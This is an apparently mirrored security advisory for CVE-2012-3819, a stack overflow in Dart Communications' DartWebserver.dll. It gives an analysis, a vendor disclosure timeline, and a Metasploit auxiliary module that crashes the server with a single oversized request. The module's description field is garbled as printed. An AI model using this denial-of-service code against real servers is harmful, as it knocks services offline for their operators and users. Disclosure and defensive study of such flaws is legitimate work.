Dart Communications Stack Overflow Vulnerability

🗓️ 03 Oct 2012 00:00:00Reported by catatonicprimeType

zdt🔗 0day.today👁 26 Views

Dart Webserver Vulnerability Stack Overflow Exceptio

Reporter	Title	Published	Views	Family All 11
Circl	CVE-2012-3819	28 Sep 201200:00	–	circl
CVE	CVE-2012-3819	4 Oct 201210:00	–	cve
Cvelist	CVE-2012-3819	4 Oct 201210:00	–	cvelist
Exploit DB	PowerTCP WebServer for - ActiveX Denial of Service	28 Sep 201200:00	–	exploitdb
EUVD	EUVD-2012-3766	7 Oct 202500:30	–	euvd
exploitpack	PowerTCP WebServer for - ActiveX Denial of Service	28 Sep 201200:00	–	exploitpack
NVD	CVE-2012-3819	4 Oct 201211:11	–	nvd
Packet Storm	Dart Communications Stack Overflow	2 Oct 201200:00	–	packetstorm
Prion	Design/Logic Flaw	4 Oct 201211:11	–	prion
securityvulns	CVE-2012-3819: Stack Overflow in DartWebserver.dll <= 1.9	4 Oct 201200:00	–	securityvulns

Overview
===============
DartWebserver.Dll is an HTTP server provided by Dart Comunications
(dart.com). It is distributed intheir PowerTCP/Webserver For ActiveX
product and likely other similar products.

"Build web applications in any familiar software development
environment. Use WebServer for ActiveX to add web-based access to
traditional compiled applications."

Version 1.9 and prior is vulnerable to a stack overflow exception,
these maybe generated by producing large requests to the application,
e.g. "a" * 5200000 + "\n\n"

Analysis
===============
During the processing of incoming HTTP requests the server collects
data until it encounters a "\n\n" sentinel. If the request is large,
multiple copies are made and stored on the stack, this consumes the
amount of stack space available to the process quickly, leading to a
stack overflow exception being thrown. This exception is not handled
and will typically lead to the termination of the parent process. Some
variations may exist per system depending on pre-existing memory
conditions and modification of Proof Of Concept (PoC) code may be
necessary to reproduce the exception.

Timeline
===============
10/20/2011 - Discovered the bug in an affected vendor application
10/20/2011 - Contacted affected vendor
10/21/2011 - Affected vendor replies stating they can not get the
product vendor to create a fix
06/29/2012 - CVE assignment
08/08/2012 - Contacted product vendor providing specifics
08/20/2012 - Product vendor created an issue number (#5654) for the
bug, but reply "there are not immediate plans to resolve the issue"
09/28/2012 - Posting to bugtraq, for the first time ever ;-)

PoC (MSF Module)
===============
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos

def initialize(info = {})
    super(update_info(info,
        'Description'    => %q{   'Name'           => 'Dart Webserver
<= 1.9.0 Stack Overflow',
        Dart Webserver from Dart Communications throws a stack
overflow exception
        when processing large requests.
    }
    ,
    'Author'         => [
    'catatonicprime'
    ],
    'Version'        => '$Revision: 15513 $',
    'License'        => MSF_LICENSE,
    'References'     => [
        [ 'CVE', '2012-3819' ],
        ],
    'DisclosureDate' => '9/28/2012'))

    register_options([
        Opt::RPORT(80),
        OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',
'520000' ])
    ])
    end
    def run
        serverIP = datastore['RHOST']
        if (datastore['RPORT'].to_i != 80)
            serverIP += ":" + datastore['RPORT'].to_s
        end
        size = datastore['SIZE']

        print_status("Crashing the server ...")
        request = "A" * size + "\r\n\r\n"
        connect
        sock.put(request)
        disconnect

    end
end



#  0day.today [2018-01-26]  #

03 Oct 2012 00:00Current

7High risk

Vulners AI Score7

EPSS0.07592